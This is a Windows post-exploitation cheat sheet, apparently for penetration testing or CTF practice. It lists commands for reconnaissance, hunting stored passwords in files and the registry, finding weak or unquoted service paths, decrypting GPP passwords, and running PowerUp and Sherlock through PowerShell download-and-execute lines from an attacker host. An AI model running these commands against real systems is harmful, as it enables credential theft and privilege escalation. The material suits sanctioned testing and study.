Windows enumeration

Manual post exploitation recon for windows targets

#Basics

#systeminfo
hostname

# Who am I?
whoami
echo %username%

# What users/localgroups are on the machine?
net users
net localgroup

# More info about a specific user. Check if user has privileges.
net user user1

# View Domain Groups
net group /domain

# View Members of Domain Group
net group /domain <Group Name>

# Firewall
netsh firewall show state
netsh firewall show config

# Network
ipconfig /all
route print
arp -A

# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn

#Cleartext passwords

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*

#Passwords in files

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini

#Passwords in registry

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP parameters
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

#Checking for Kernel exploits

systeminfo
# or
wmic qfe get Caption,Description,HotFixID,InstalledOn

#Scheduled tasks

schtasks /query /fo LIST /v

#Weak service permissions

#will spit out a ton of output

wmic service list brief

#To prune the output into something more manageable, leverage wmic and icacls
from C:\Windows\temp, try:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

Then:

for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

#sc.exe

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt

FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt

FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt

FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

#Unquoted service paths: if the path contains a space and is not quoted, the service is vulnerable.

# Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

# Using sc
sc query
sc qc service name

# Look for Binary_path_name and see if it is unquoted.

#Example of an unquoted executable:
c:\Program Files\something\winamp.exe

#We can place a payload like this: 

c:\evil.exe

#There is also a metasploit module: 
exploit/windows/local/trusted_service_path

#Check for vulnerable drivers

# List all drivers
driverquery

#Group policy preferences

# Output environment-variables
set

# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=EXAMPLE.LOCAL

# Look up the IP address
nslookup nameofserver.example.local

# It will output something like this
Address:  192.168.1.101

# Now you can mount it
net use z: \\192.168.1.101\SYSVOL

# Enter
z:

# Now search for the groups.xml file
dir Groups.xml /s

#If an encrypted password is found, exfiltrate it to Kali and crack it:

gpp-decrypt encryptedpassword

#Ping test for blind RCE

C:\Windows\System32\cmd.exe /c ping 10.10.10.10
# on linux box: 
tcpdump -i tun0 icmp

#Same if powershell is available

C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe ping 10.10.10.10

#Firewall / AV / Defender

netsh firewall show state  
netsh firewall show config  
Sc query windefend
Netsh advfirewall firewall dump, netsh firewall show state

#Automated tools checklist

#Run winpeas 
Run PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerUp.ps1');Invoke-AllChecks"

#Run Sherlock.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1');Find-AllVulns"

#Run JAWS

# Executables  
WinPEAS.exe /.bat * 
Seatbelt.exe 
Watson.exe * 
Sharpup.exe 
windows-privesc-check2.exe --dump -G

#Powershell 
Sherlock.ps1 * 
PowerUp.ps1 * 
jaws-enum.ps1 * 


#Other 
Windows-exploit-suggester.py *
Save the systeminfo output to a text file and run it through windows-exploit-suggester.py; search for the suggested exploit in the SecWiki GitHub 

MSF exploit suggester *
In a meterpreter session – run /post/multi/recon/local_exploit_suggester -> shows a list of kernel exploits
